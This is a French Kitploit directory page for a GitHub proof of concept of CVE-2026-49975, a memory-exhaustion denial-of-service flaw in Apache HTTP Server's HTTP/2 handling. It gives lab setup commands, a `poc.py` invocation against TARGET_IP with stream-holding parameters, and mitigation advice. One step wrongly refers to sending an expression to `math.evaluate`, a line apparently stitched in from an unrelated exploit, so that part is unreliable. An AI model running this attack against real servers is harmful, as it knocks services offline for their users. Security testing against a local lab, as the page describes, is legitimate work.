Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-49975 — Bombe HTTP/2 | Kitploit
Outils/GitHubGitHub/eqstlab/cve-2026-49975
Analyse des VulnérabilitésExploitationSécurité WebFuzzingTests d'Intrusion
GitHubeqstlab/cve-2026-49975

CVE-2026-49975

Bombe HTTP/2

Voir le dépôt
1431il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-49975 Bombe HTTP/2

★ CVE-2026-49975 PoC de la Bombe HTTP/2 ★

https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74


Aperçu

CVE-2026-49975 est une vulnérabilité de déni de service (DoS) dans le serveur Apache HTTP. La vulnérabilité se produit dans le chemin de traitement des requêtes HTTP/2, où plusieurs champs d’en-tête cookie peuvent être fusionnés sans être correctement comptabilisés dans LimitRequestFields. En envoyant une petite requête HTTP/2 encodée en HPACK qui se développe en plusieurs champs d’en-tête cookie, un attaquant peut forcer le serveur à allouer de la mémoire de manière répétée lors de la fusion des en-têtes Cookie. L’attaquant peut ensuite utiliser le contrôle de flux HTTP/2 pour retarder la transmission des réponses, en maintenant les flux affectés ouverts et en empêchant la libération de la mémoire allouée.


Versions affectées

CatégorieVersion
VulnérableApache HTTP Server 2.4.17 ≤ version ≤ 2.4.67
CorrigéeApache HTTP Server 2.4.68 ou ultérieure

Impact

  • Déni de service à distance (DoS)
  • Consommation excessive de mémoire
  • Traitement retardé ou échoué des requêtes normales des utilisateurs

Environnement

Construisez et exécutez l’environnement vulnérable du serveur Apache HTTP.

root@kitploit:~
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975

PoC

Après avoir démarré l’environnement vulnérable, suivez les étapes ci-dessous pour reproduire l’attaque.

Étape 1. Surveiller l’utilisation mémoire du serveur

root@kitploit:~
docker stats cve-2026-49975

Exemple de sortie :

root@kitploit:~
CONTAINER ID   NAME             CPU %   MEM USAGE / LIMIT     MEM %
xxxxxxxxxxxx   cve-2026-49975   0.5%    35.2MiB / 8.0GiB      1.7%

Étape 2. Exécuter le PoC de la Bombe HTTP/2

Envoyez l’expression suivante à math.evaluate (par exemple, via l’entrée de calcul de l’application).

root@kitploit:~
python3 poc.py \
  --host TARGET_IP \
  --port 10081 \
  --connections 10 \
  --streams 100 \
  --refs 4091 \
  --initial-window 0 \
  --hold 300 \
  --drip-interval 2 \
  --drip-bytes 1

Étape 3. Confirmer le résultat

Vérifiez que l’utilisation mémoire du conteneur Apache augmente et reste élevée tant que les flux d’attaque sont maintenus ouverts.

Atténuation

  • Mettez à jour le serveur Apache HTTP vers la version 2.4.68 ou ultérieure.
  • Envisagez de désactiver temporairement HTTP/2 si le service ne l’exige pas.

Analyse

  • Coréen : https://www.skshieldus.com/security-insights/reports/eqst-apache-http2-dos-cve-2026-49975
  • Anglais : https://httpd.apache.org/security/vulnerabilities_24.html
Télécharger l’outil